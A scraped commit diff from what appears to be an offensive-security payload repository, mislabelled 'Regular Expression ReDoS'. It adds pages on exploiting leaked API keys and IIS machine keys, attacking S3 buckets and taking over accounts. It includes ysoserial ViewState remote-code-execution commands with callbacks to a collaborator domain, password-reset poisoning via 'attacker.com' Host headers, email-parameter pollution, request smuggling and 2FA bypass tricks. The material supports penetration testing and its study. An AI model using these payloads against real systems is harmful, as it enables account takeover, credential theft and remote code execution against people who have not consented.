Regular Expression ReDoS

Adding socials buttons
Mkdocs accessibility and search improvement
2024-04-25 17:37:16 +02:00 · 2024-04-24 22:02:04 +02:00 · 2024-04-15 21:20:02 +02:00 · 2024-04-05 18:55:52 +02:00 · 2024-04-05 11:55:54 -03:00 · 2024-04-05 15:53:05 +02:00
241 changed files with 22460 additions and 8210 deletions
--- a/.github/FUNDING.yml
+++ b/.github/FUNDING.yml
@@ -0,0 +1,4 @@
 # These are supported funding model platforms
 github: swisskyrepo
 ko_fi: swissky
 custom: https://www.buymeacoffee.com/swissky
--- a/.github/banner.png
+++ b/.github/banner.png
--- a/.github/hopla_config.json
+++ b/.github/hopla_config.json
--- a/.github/overrides/main.html
+++ b/.github/overrides/main.html
@@ -0,0 +1,27 @@
 {% extends "base.html" %}
 {% block content %}
 	{{ super() }}
  <div class="social-container">
    <b>Share this content</b>
    <div class="a2a_kit a2a_kit_size_32 a2a_default_style">
      <a class="a2a_dd" href="https://www.addtoany.com/share"></a>
      <a class="a2a_button_x"></a>
      <a class="a2a_button_telegram"></a>
      <a class="a2a_button_linkedin"></a>
      <a class="a2a_button_email"></a>
      <a class="a2a_button_microsoft_teams"></a>
    </div>
    <br>
    <script async src="https://static.addtoany.com/menu/page.js"></script>
  </div>
 {% endblock %}
 {% block styles %}
 	{{ super() }}
  <style>
  .social-container {
    float: right;
  }
  </style>
 {% endblock %}
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -0,0 +1,34 @@
 name: ci 
 on:
  push:
    branches:
      - master
 jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
        with:
          submodules: recursive
      # Checks-out submodules
      - uses: actions/checkout@v2
      - name: Checkout submodules
        shell: bash
        run: |
          git config --global user.email "no-reply@github.com"
          git config --global user.name "Swk"
          git config --global pull.rebase false
          git submodule add https://github.com/swisskyrepo/PayloadsAllTheThings/ docs
          mv docs/.github/overrides .
      - uses: actions/setup-python@v2
        with:
          python-version: 3.x
      - run: pip install mkdocs-material
      - run: pip install mkdocs-git-revision-date-localized-plugin
      - run: pip install mkdocs-git-committers-plugin
      - run: pip install mkdocs-material[imaging]
      - run: mkdocs gh-deploy --force
--- a/.gitignore
+++ b/.gitignore
@@ -1,4 +1,3 @@
 BuildPDF/
 .vscode
-.todo
+.todo
 AWS Amazon Lambda/
--- a/Leaks/Files/MachineKeys.txt
+++ b/Leaks/Files/MachineKeys.txt
--- a/Leaks/README.md
+++ b/Leaks/README.md
@@ -0,0 +1,241 @@
 # API Key Leaks
 > The API key is a unique identifier that is used to authenticate requests associated with your project. Some developers might hardcode them or leave it on public shares.
 ## Summary
 - [Tools](#tools)
 - [Exploit](#exploit)
    - [Google Maps](#google-maps)
    - [Algolia](#algolia)
    - [Slack API Token](#slack-api-token)
    - [Facebook Access Token](#facebook-access-token)
    - [Github client id and client secret](#github-client-id-and-client-secret)
    - [Twilio Account_sid and Auth Token](#twilio-account_sid-and-auth-token)
    - [Twitter API Secret](#twitter-api-secret)
    - [Twitter Bearer Token](#twitter-bearer-token)
    - [Gitlab Personal Access Token](#gitlab-personal-access-token)
    - [HockeyApp API Token](#hockeyapp-api-token)
    - [IIS Machine Keys](#iis-machine-keys)
    - [Mapbox API Token](#Mapbox-API-Token)
 ## Tools
 - [momenbasel/KeyFinder](https://github.com/momenbasel/KeyFinder) - is a tool that let you find keys while surfing the web
 - [streaak/keyhacks](https://github.com/streaak/keyhacks) - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid
 - [trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog) - Find credentials all over the place
    ```ps1
    ## Scan a Github Organization
    docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity
    ## Scan a GitHub Repository, its Issues and Pull Requests
    docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys --issue-comments --pr-comments
    ## Scan a Docker image for verified secrets
    docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest docker --image trufflesecurity/secrets
    ```
 - [aquasecurity/trivy](https://github.com/aquasecurity/trivy) - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets
 - [projectdiscovery/nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) - Use these templates to test an API token against many API service endpoints
    ```powershell
    nuclei -t token-spray/ -var token=token_list.txt
    ```
 - [blacklanternsecurity/badsecrets](https://github.com/blacklanternsecurity/badsecrets) - A library for detecting known or weak secrets on across many platforms
    ```ps1
    python examples/cli.py --url http://example.com/contains_bad_secret.html
    python examples/cli.py eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo
    python ./badsecrets/examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE
    python ./badsecrets/examples/telerik_knownkey.py --url http://vulnerablesite/Telerik.Web.UI.DialogHandler.aspx
    python ./badsecrets/examples/symfony_knownkey.py --url https://localhost/
    ```
 - [mazen160/secrets-patterns-db](https://github.com/mazen160/secrets-patterns-db) - Secrets Patterns DB: The largest open-source Database for detecting secrets, API keys, passwords, tokens, and more.
 ## Exploit
 The following commands can be used to takeover accounts or extract personal information from the API using the leaked token.
 ### Google Maps 
 Use : https://github.com/ozguralp/gmapsapiscanner/
 |  Name                 |  Endpoint |
 | --------------------- | --------- |
 |  Static Maps          | https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key=KEY_HERE   |
 |  Streetview           | https://maps.googleapis.com/maps/api/streetview?size=400x400&location=40.720032,-73.988354&fov=90&heading=235&pitch=10&key=KEY_HERE |
 |  Embed                | https://www.google.com/maps/embed/v1/place?q=place_id:ChIJyX7muQw8tokR2Vf5WBBk1iQ&key=KEY_HERE  |
 |  Directions           | https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key=KEY_HERE    |
 |  Geocoding            | https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key=KEY_HERE |
 |  Distance Matrix      | https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key=KEY_HERE   |
 |  Find Place from Text | https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,opening_hours,geometry&key=KEY_HERE    |
 |  Autocomplete         | https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key=KEY_HERE    |
 |  Elevation            | https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key=KEY_HERE  |
 |  Timezone             | https://maps.googleapis.com/maps/api/timezone/json?location=39.6034810,-119.6822510&timestamp=1331161200&key=KEY_HERE   |
 |  Roads                | https://roads.googleapis.com/v1/nearestRoads?points=60.170880,24.942795|60.170879,24.942796|60.170877,24.942796&key=KEY_HERE    |
 |  Geolocate            | https://www.googleapis.com/geolocation/v1/geolocate?key=KEY_HERE |
 Impact:
 * Consuming the company's monthly quota or can over-bill with unauthorized usage of this service and do financial damage to the company
 * Conduct a denial of service attack specific to the service if any limitation of maximum bill control settings exist in the Google account
 ### Algolia 
 ```powershell
 curl --request PUT \
  --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
  --header 'content-type: application/json' \
  --header 'x-algolia-api-key: <example-key>' \
  --header 'x-algolia-application-id: <example-application-id>' \
  --data '{"highlightPreTag": "<script>alert(1);</script>"}'
 ```
 ### Slack API Token
 ```powershell
 curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1"
 ```
 ### Facebook Access Token
 ```powershell
 curl https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2
 ```
 ### Github client id and client secret
 ```powershell
 curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy'
 ```
 ### Twilio Account_sid and Auth token
 ```powershell
 curl -X GET 'https://api.twilio.com/2010-04-01/Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN
 ```
 ### Twitter API Secret
 ```powershell
 curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token'
 ```
 ### Twitter Bearer Token
 ```powershell
 curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN'
 ```
 ### Gitlab Personal Access Token
 ```powershell
 curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_token>"
 ```
 ### HockeyApp API Token
 ```powershell
 curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c" https://rink.hockeyapp.net/api/2/apps/2021bdf2671ab09174c1de5ad147ea2ba4
 ```
 ### IIS Machine Keys
 > That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.
 Requirements
 * machineKey **validationKey** and **decryptionKey**
 * __VIEWSTATEGENERATOR cookies
 * __VIEWSTATE cookies
 Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication.
 ```xml
 <machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" />
 ```
 Common locations of **web.config** / **machine.config**
 * 32-bit
    * C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config
    * C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config
 * 64-bit
    * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\config\machine.config
    * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\machine.config
 * in registry when **AutoGenerate** is enabled (extract with https://gist.github.com/irsdl/36e78f62b98f879ba36f72ce4fda73ab)
    * HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\4.0.30319.0\AutoGenKeyV4  
    * HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\2.0.50727.0\AutoGenKey
 #### Identify known machine key
 * Exploit with [Blacklist3r/AspDotNetWrapper](https://github.com/NotSoSecure/Blacklist3r)
 * Exploit with [ViewGen](https://github.com/0xacb/viewgen)
 ```powershell
 # --webconfig WEBCONFIG: automatically load keys and algorithms from a web.config file
 # -m MODIFIER, --modifier MODIFIER: VIEWSTATEGENERATOR value
 $ viewgen --guess "/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkuVmqYhhtcnJl6Nfet5ERqNHMADI="
 [+] ViewState is not encrypted
 [+] Signature algorithm: SHA1
 # --encrypteddata : __VIEWSTATE parameter value of the target application
 # --modifier : __VIEWSTATEGENERATOR parameter value
 $ AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata <real viewstate value> --purpose=viewstate --modifier=<modifier value> –macdecode
 ```
 #### Decode ViewState
 ```powershell
 $ viewgen --decode --check --webconfig web.config --modifier CA0B0334 "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY="
 $ .\AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate  --modifier=CA0B0334 --macdecode
 $ .\AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=6811C9FF --macdecode --TargetPagePath "/Savings-and-Investments/Application/ContactDetails.aspx" -f out.txt --IISDirPath="/"
 ```
 #### Generate ViewState for RCE
 **NOTE**: Send a POST request with the generated ViewState to the same endpoint, in Burp you should **URL Encode Key Characters** for your payload.
 ```powershell
 $ ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "cmd.exe /c nslookup <your collab domain>"  --decryptionalg="AES" --generator=ABABABAB decryptionkey="<decryption key>"  --validationalg="SHA1" --validationkey="<validation key>"
 $ ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "echo 123 > c:\pwn.txt" --generator="CA0B0334" --validationalg="MD5" --validationkey="b07b0f97365416288cf0247cffdf135d25f6be87"
 $ ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "C:\Users\zhu\Desktop\ExploitClass.cs;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.dll;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Web.dll" --generator="CA0B0334" --validationalg="SHA1" --validationkey="b07b0f97365416288cf0247cffdf135d25f6be87"
 $ viewgen --webconfig web.config -m CA0B0334 -c "ping yourdomain.tld"
 ```
 #### Edit cookies with the machine key
 If you have the machineKey but the viewstate is disabled.
 ASP.net Forms Authentication Cookies : https://github.com/liquidsec/aspnetCryptTools
 ```powershell
 # decrypt cookie
 $ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes
 # encrypt cookie (edit Decrypted.txt)
 $ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
 ```
 ### Mapbox API Token
 A Mapbox API Token is a JSON Web Token (JWT). If the header of the JWT is `sk`, jackpot. If it's `pk` or `tk`, it's not worth your time.
 ```
 #Check token validity
 curl "https://api.mapbox.com/tokens/v2?access_token=YOUR_MAPBOX_ACCESS_TOKEN"
 #Get list of all tokens associated with an account. (only works if the token is a Secret Token (sk), and has the appropriate scope)
 curl "https://api.mapbox.com/tokens/v2/MAPBOX_USERNAME_HERE?access_token=YOUR_MAPBOX_ACCESS_TOKEN"
 ```
 ## References
 * [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d)
 * [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060)
 * [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/)
 * [Saying Goodbye to my Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020](https://www.allysonomalley.com/2020/01/06/saying-goodbye-to-my-favorite-5-minute-p1/)
 * [Mapbox API Token Documentation](https://docs.mapbox.com/help/troubleshooting/how-to-use-mapbox-securely/)
--- a/S3/README.md
+++ b/S3/README.md
@@ -2,46 +2,16 @@
 ## Summary
 - [Tools](#tools)
 - [AWS Configuration](#aws-configuration)
 - [Open Bucket](#open-bucket)
 - [Basic tests](#basic-tests)
 	- [Listing files](#listing-files)
-	- [Move a file into the bucket](move-a-file-into-the-bucket)
+	- [Move a file into the bucket](#move-a-file-into-the-bucket)
 	- [Download every things](#download-every-things)
 	- [Check bucket disk size](#check-bucket-disk-size)
 - [AWS - Extract Backup](#aws---extract-backup)
 - [Bucket juicy data](#bucket-juicy-data)
 ## Tools
 - [Pacu - The AWS exploitation framework, designed for testing the security of Amazon Web Services environments](https://github.com/RhinoSecurityLabs/pacu)
 - [Bucket Finder - Search for readable buckets and list all the files in them](https://digi.ninja/)
 	```powershell
 	wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2
 	./bucket_finder.rb my_words
 	./bucket_finder.rb --region ie my_words
 		US Standard         = http://s3.amazonaws.com
 		Ireland             = http://s3-eu-west-1.amazonaws.com
 		Northern California = http://s3-us-west-1.amazonaws.com
 		Singapore           = http://s3-ap-southeast-1.amazonaws.com
 		Tokyo               = http://s3-ap-northeast-1.amazonaws.com
 	./bucket_finder.rb --download --region ie my_words
 	./bucket_finder.rb --log-file bucket.out my_words
 	```
 - [Boto3 - Amazon Web Services (AWS) SDK for Python](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html)
 	```python
 	import boto3
 	# Create an S3 client
 	s3 = boto3.client('s3',aws_access_key_id='AKIAJQDP3RKREDACTED',aws_secret_access_key='igH8yFmmpMbnkcUaCqXJIRIozKVaREDACTED',region_name='us-west-1')
 	try:
 		result = s3.list_buckets()
 		print(result)
 	except Exception as e:
 		print(e)
 	```
 ## AWS Configuration
@@ -82,6 +52,7 @@ By default the name of Amazon Bucket are like http://s3.amazonaws.com/[bucket_na
 http://s3.amazonaws.com/[bucket_name]/
 http://[bucket_name].s3.amazonaws.com/
 http://flaws.cloud.s3.amazonaws.com/
 https://buckets.grayhatwarfare.com/
 ```
 Their names are also listed if the listing is enabled.
@@ -105,7 +76,7 @@ eg: http://redacted/avatar/123%C0
 ```bash
 aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here
-aws s3 ls  s3://flaws.cloud/ --no-sign-request --region us-west-2
+aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2
 ```
 You can get the region with a dig and nslookup
@@ -152,22 +123,24 @@ aws s3 ls s3://<bucketname> --recursive  | grep -v -E "(Bucket: |Prefix: |LastWr
 ## AWS - Extract Backup
 ```powershell
-aws --profile flaws sts get-caller-identity
+$ aws --profile flaws sts get-caller-identity
 "Account": "XXXX26262029",
-aws --profile flaws  ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2    
+
 $ aws --profile profile_name ec2 describe-snapshots
 $ aws --profile flaws ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2
 "SnapshotId": "snap-XXXX342abd1bdcb89",
 Create a volume using snapshot
-aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id  snap-XXXX342abd1bdcb89
+$ aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id  snap-XXXX342abd1bdcb89
 In Aws Console -> EC2 -> New Ubuntu
-chmod 400 YOUR_KEY.pem
+$ chmod 400 YOUR_KEY.pem
-ssh -i YOUR_KEY.pem  ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com
+$ ssh -i YOUR_KEY.pem  ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com
 Mount the volume
-lsblk
+$ lsblk
-sudo file -s /dev/xvda1
+$ sudo file -s /dev/xvda1
-sudo mount /dev/xvda1 /mnt
+$ sudo mount /dev/xvda1 /mnt
 ```
 ## Bucket juicy data
@@ -183,40 +156,13 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
 For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
 ## Enumerate IAM permissions
 Enumerate the permissions associated with AWS credential set with [enumerate-iam](https://github.com/andresriancho/enumerate-iam)
 ```powershell
 git clone git@github.com:andresriancho/enumerate-iam.git
 cd enumerate-iam/
 pip install -r requirements.txt
 ./enumerate-iam.py --access-key AKIA... --secret-key StF0q...
 2019-05-10 15:57:58,447 - 21345 - [INFO] Starting permission enumeration for access-key-id "AKIA..."
 2019-05-10 15:58:01,532 - 21345 - [INFO] Run for the hills, get_account_authorization_details worked!
 2019-05-10 15:58:01,537 - 21345 - [INFO] -- {
    "RoleDetailList": [
        {
            "Tags": [], 
            "AssumeRolePolicyDocument": {
                "Version": "2008-10-17", 
                "Statement": [
                    {
 ...
 2019-05-10 15:58:26,709 - 21345 - [INFO] -- gamelift.list_builds() worked!
 2019-05-10 15:58:26,850 - 21345 - [INFO] -- cloudformation.list_stack_sets() worked!
 2019-05-10 15:58:26,982 - 21345 - [INFO] -- directconnect.describe_locations() worked!
 2019-05-10 15:58:27,021 - 21345 - [INFO] -- gamelift.describe_matchmaking_rule_sets() worked!
 2019-05-10 15:58:27,311 - 21345 - [INFO] -- sqs.list_queues() worked!
 ```
 ## References
 * [There's a Hole in 1,951 Amazon S3 Buckets - Mar 27, 2013 - Rapid7 willis](https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets)
-* [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792)
+* [Bug Bounty Survey - AWS Basic test](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136)
 * [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/)
 * [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud)
-* [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/)
+* [Guardzilla video camera hardcoded AWS credential ~~- 0dayallday.org~~ - blackmarble.sh](https://blackmarble.sh/guardzilla-video-camera-hard-coded-aws-credentials/)
 * [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/)
-* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/)
+* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/)
 * [A Technical Analysis of the Capital One Hack - CloudSploit - Aug 2 2019](https://blog.cloudsploit.com/a-technical-analysis-of-the-capital-one-hack-a9b43d7c8aea?gi=8bb65b77c2cf)
--- a/Takeover/README.md
+++ b/Takeover/README.md
@@ -0,0 +1,275 @@
 # Account Takeover
 ## Summary
 * [Password Reset Feature](#password-reset-feature)
    * [Password Reset Token Leak Via Referrer](#password-reset-token-leak-via-referrer)
    * [Account Takeover Through Password Reset Poisoning](#account-takeover-through-password-reset-poisoning)
    * [Password Reset Via Email Parameter](#password-reset-via-email-parameter)
    * [IDOR on API Parameters](#idor-on-api-parameters)
    * [Weak Password Reset Token](#weak-password-reset-token)
    * [Leaking Password Reset Token](#leaking-password-reset-token)
    * [Password Reset Via Username Collision](#password-reset-via-username-collision)
    * [Account takeover due to unicode normalization issue](#account-takeover-due-to-unicode-normalization-issue)
 * [Account Takeover Via Cross Site Scripting](#account-takeover-via-cross-site-scripting)
 * [Account Takeover Via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling)
 * [Account Takeover via CSRF](#account-takeover-via-csrf)
 * [2FA Bypasses](#2fa-bypasses)
    * [Response Manipulation](#reponse-manipulation)
    * [Status Code Manipulation](#status-code-manipulation)
    * [2FA Code Leakage in Response](#2fa-code-leakage-in-response)
    * [JS File Analysis](#js-file-analysis)
    * [2FA Code Reusability](#2fa-code-reusability)
    * [Lack of Brute-Force Protection](#lack-of-brute-force-protection)
    * [Missing 2FA Code Integrity Validation](#missing-2fa-code-integrity-validation)
    * [CSRF on 2FA Disabling](#csrf-on-2fa-disabling)
    * [Password Reset Disable 2FA](#password-reset-disable-2fa)
    * [Backup Code Abuse](#backup-code-abuse)
    * [Clickjacking on 2FA Disabling Page](#clickjacking-on-2fa-disabling-page)
    * [Enabling 2FA doesn't expire Previously active Sessions](#enabling-2fa-doesnt-expire-previously-active-sessions)
    * [Bypass 2FA by Force Browsing](#bypass-2fa-by-force-browsing)
    * [Bypass 2FA with null or 000000](#bypass-2fa-with-null-or-000000)
    * [Bypass 2FA with array](#bypass-2fa-with-array)
 * [References](#references)
 ## Password Reset Feature
 ### Password Reset Token Leak Via Referrer
 1. Request password reset to your email address
 2. Click on the password reset link
 3. Don't change password
 4. Click any 3rd party websites(eg: Facebook, twitter)
 5. Intercept the request in Burp Suite proxy
 6. Check if the referer header is leaking password reset token.
 ### Account Takeover Through Password Reset Poisoning
 1. Intercept the password reset request in Burp Suite
 2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
 3. Forward the request with the modified header
    ```http
    POST https://example.com/reset.php HTTP/1.1
    Accept: */*
    Content-Type: application/json
    Host: attacker.com
    ```
 4. Look for a password reset URL based on the *host header* like : `https://attacker.com/reset-password.php?token=TOKEN`
 ### Password Reset Via Email Parameter
 ```powershell
 # parameter pollution
 email=victim@mail.com&email=hacker@mail.com
 # array of emails
 {"email":["victim@mail.com","hacker@mail.com"]}
 # carbon copy
 email=victim@mail.com%0A%0Dcc:hacker@mail.com
 email=victim@mail.com%0A%0Dbcc:hacker@mail.com
 # separator
 email=victim@mail.com,hacker@mail.com
 email=victim@mail.com%20hacker@mail.com
 email=victim@mail.com|hacker@mail.com
 ```
 ### IDOR on API Parameters
 1. Attacker have to login with their account and go to the **Change password** feature.
 2. Start the Burp Suite and Intercept the request
 3. Send it to the repeater tab and edit the parameters : User ID/email
    ```powershell
    POST /api/changepass
    [...]
    ("form": {"email":"victim@email.com","password":"securepwd"})
    ```
 ### Weak Password Reset Token
 The password reset token should be randomly generated and unique every time.
 Try to determine if the token expire or if it's always the same, in some cases the generation algorithm is weak and can be guessed. The following variables might be used by the algorithm.
 * Timestamp
 * UserID
 * Email of User
 * Firstname and Lastname
 * Date of Birth
 * Cryptography
 * Number only
 * Small token sequence (<6 characters between [A-Z,a-z,0-9])
 * Token reuse
 * Token expiration date
 ### Leaking Password Reset Token
 1. Trigger a password reset request using the API/UI for a specific email e.g: test@mail.com
 2. Inspect the server response and check for `resetToken`
 3. Then use the token in an URL like `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
 ### Password Reset Via Username Collision
 1. Register on the system with a username identical to the victim's username, but with white spaces inserted before and/or after the username. e.g: `"admin "`
 2. Request a password reset with your malicious username.
 3. Use the token sent to your email and reset the victim password.
 4. Connect to the victim account with the new password.
 The platform CTFd was vulnerable to this attack. 
 See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
 ### Account takeover due to unicode normalization issue
 When processing user input involving unicode for case mapping or normalisation, unexcepted behavior can occur.  
 - Victim account: `demo@gmail.com`
 - Attacker account: `demⓞ@gmail.com`
 [Unisub - is a tool that can suggest potential unicode characters that may be converted to a given character](https://github.com/tomnomnom/hacks/tree/master/unisub).
 [Unicode pentester cheatsheet](https://gosecure.github.io/unicode-pentester-cheatsheet/) can be used to find list of suitable unicode characters based on platform.
 ## Account Takeover Via Cross Site Scripting
 1. Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain : `*.domain.com`
 2. Leak the current **sessions cookie**
 3. Authenticate as the user using the cookie
 ## Account Takeover Via HTTP Request Smuggling
 Refer to **HTTP Request Smuggling** vulnerability page.
 1. Use **smuggler** to detect the type of HTTP Request Smuggling (CL, TE, CL.TE)
    ```powershell
    git clone https://github.com/defparam/smuggler.git
    cd smuggler
    python3 smuggler.py -h
    ```
 2. Craft a request which will overwrite the `POST / HTTP/1.1` with the following data:
    ```powershell
    GET http://something.burpcollaborator.net  HTTP/1.1
    X: 
    ```
 3. Final request could look like the following
    ```powershell
    GET /  HTTP/1.1
    Transfer-Encoding: chunked
    Host: something.com
    User-Agent: Smuggler/v1.0
    Content-Length: 83
    0
    GET http://something.burpcollaborator.net  HTTP/1.1
    X: X
    ```
 Hackerone reports exploiting this bug
 * https://hackerone.com/reports/737140
 * https://hackerone.com/reports/771666
 ## Account Takeover via CSRF
 1. Create a payload for the CSRF, e.g: "HTML form with auto submit for a password change"
 2. Send the payload
 ## Account Takeover via JWT
 JSON Web Token might be used to authenticate an user. 
 * Edit the JWT with another User ID / Email
 * Check for weak JWT signature 
 ## 2FA Bypasses
 ### Response Manipulation
 In response if `"success":false`
 Change it to `"success":true`
 ### Status Code Manipulation
 If Status Code is **4xx**
 Try to change it to **200 OK** and see if it bypass restrictions
 ### 2FA Code Leakage in Response
 Check the response of the 2FA Code Triggering Request to see if the code is leaked.
 ### JS File Analysis
 Rare but some JS Files may contain info about the 2FA Code, worth giving a shot
 ### 2FA Code Reusability
 Same code can be reused
 ### Lack of Brute-Force Protection
 Possible to brute-force any length 2FA Code
 ### Missing 2FA Code Integrity Validation
 Code for any user acc can be used to bypass the 2FA
 ### CSRF on 2FA Disabling
 No CSRF Protection on disabling 2FA, also there is no auth confirmation
 ### Password Reset Disable 2FA
 2FA gets disabled on password change/email change
 ### Backup Code Abuse
 Bypassing 2FA by abusing the Backup code feature
 Use the above mentioned techniques to bypass Backup Code to remove/reset 2FA restrictions
 ### Clickjacking on 2FA Disabling Page
 Iframing the 2FA Disabling page and social engineering victim to disable the 2FA
 ### Enabling 2FA doesn't expire Previously active Sessions
 If the session is already hijacked and there is a session timeout vuln
 ### Bypass 2FA by Force Browsing
